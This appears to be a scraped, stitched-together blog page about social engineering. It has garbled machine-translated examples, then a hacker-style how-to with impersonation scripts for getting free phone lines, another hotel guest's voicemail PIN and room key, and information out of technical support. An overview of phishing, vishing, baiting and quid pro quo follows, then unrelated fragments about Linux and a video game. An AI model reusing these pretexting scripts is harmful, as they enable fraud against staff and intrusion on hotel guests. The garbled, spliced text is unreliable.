The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker

Example 2: You receive an e-mail saying that your computer is infected by a virus. The message suggests that you install a tool available on an Internet site, to eliminate the virus from your computer.

The real function of this tool and does not eliminate a virus, but I give someone access to your computer and all data stored on it.

Example 3: a stranger calls your house and says it is the technical support of your ISP.
In this connection he says that his connection to the Internet is presenting a problem and then, ask your password to fix it. If you give your password, this so-called technical can perform a multitude of malicious activities, using your access account
Internet and therefore such activities relating to its name.

Practical Examples:

Retail Paging Systems
---------------------
Wal-Mart store phones have clearly marked buttons for the paging system. Wal-Mart is
the exception, not the rule. So how do you get on the paging system to have a little
fun when you're bored out of your mind shopping with your girlfriend? Social
engineering, my whipped friend. Find a phone and dial an extension, preferably the
store op. The key here is to become a harried employee, saying something similar
to..."This is Bill in shoes. What's the paging extension?" More often than not,
you'll get the extension without another word. Now, get some by saying something
sweet over the intercom.

Airport White Courtesy Phones
-----------------------------
Imagine you've already been stripped searched and you're waiting for your delayed
flight. Naturally, you gravitate to a phone. Is it white? Then you've got a free
call right in front of you. Just pick up to get the op. "This is Bill at Southwest,
Gate A5. We're swamped and our phones are tied. Can I get an outside line?" If
the phone does not have DTMF, or the op wants to dial the call for you, do not call
a number related to you.

Hotels
------
Hotels hold such promise. Some hotels have voice mail for each room, guests
receiving a PIN when they check in. Hotels also have "guest" phones; phones outside
of rooms that connect only to rooms or the front desk. Pick up a guest phone, make
like a friendly guest and say, "I forgot my PIN. Could I get it again? Room XXX."
Knowing the registered name of the target room helps, for the Hotel and Restaurant
Management Degree Program graduate may ask for it.

Do not follow through with the next social engineering example. Or, like the author,
try it on a friend. Go to the front desk and tell the attendant that you've locked
your key (card) in the laundromat, in your room, lost it, etc. Do not try this with
the attendant that checked you in. And again, do not enter someone's room without
permission.

Calling Technical Support
-------------------------
So you've found a new-fangled computerized phone and you want to learn more about it.
Do the same thing you do when you have trouble with your AOL - call tech support.
First, do a little planning (after getting the tech support number off of the phone
or the web). Get some info on the phone, like phone number, model number, other
identifying numbers, etc. Also, know the name of the facility in which the phone is
located. Now that you've got some ammo, you're ready to make the call. Posing as an
employee of the facility, call tech support and make up a problem for the phone
you've identified. Act a little dumb and be apologetic, acting like you don't want
to waste their time. All the while, pumping them for information - "I hate to bug
you for this, but <insert problem here>." <You'll get some info from tech support
here.> <Build on what you've learned and curiously ask another question.> And so
on until you reach the point where you can feel that it's time to end the call.
Occasionally acting amazed at their knowledge may be helpful.

Methods of Social Engineering

Phishing
Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not provided. The e-mail usually contains a link to a fraudulent web page that seems legitimate — with company logos and content — and has a form requesting everything from a home address to an ATM card's PIN.

For example, 2003 saw the proliferation of a phishing scam in which users received e-mails supposedly from eBay claiming that the user's account was about to be suspended unless a link provided was clicked to update a credit card (information that the genuine eBay already had). Because it is relatively simple to make a Web site resemble a legitimate organization's site by mimicking the HTML code, the scam counted on people being tricked into thinking they were being contacted by eBay and subsequently, were going to eBay's site to update their account information. By spamming large groups of people, the "phisher" counted on the e-mail being read by a percentage of people who already had listed credit card numbers with eBay legitimately, who might respond.

Vishing or Phone Phishing:
This technique uses an Interactive Voice Response (IVR) system to recreate a legit sounding copy of a bank or other institution's IVR system. The slave is prompted to call in to the "bank" via a phone number provided in order to "verify" information.

Baiting
Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the slave. In this attack, the attacker leaves a malware infected floppy disc, CD ROM, or USB flash drive in a location sure to be found, gives it a legitimate looking and curiosity-piquing label, and simply waits for the slave to use the device.

Quid pro quo
Quid pro quo means something for something:

* An attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and in the process have the user type commands that give the attacker access or launch malware.

* In a 2003 information security survey, 90% of office workers gave researchers what they claimed was their password in answer to a survey question in exchange for a cheap pen. Similar surveys in later years obtained similar results using chocolates and other cheap lures, although they made no attempt to validate the passwords.

List Of Every Linux Version and Release

A-Z Index of the Bash command line for Linux.

http://ss64.com/bash/

A-Z Index of the Bash command line for Linux....

Wednesday, 1 May 2013

Battlefield: Bad Company 2 [Full]

Battlefield: Bad Company 2

Publisher: Electronic Arts
Developer: Digital Illusions CE (DICE)
Release Date: March 2, 2010 (US)
Genre: Action,

About Battlefield: Bad Company 2

In Battlefield: Bad Company 2, the Bad Company crew again find themselves in the heart of the action, where they must use every weapon and vehicle at their disposal to survive. The action unfolds with unprecedented intensity, introducing a level of fervor to vehicular warfare never before experienced in a modern warfare action game.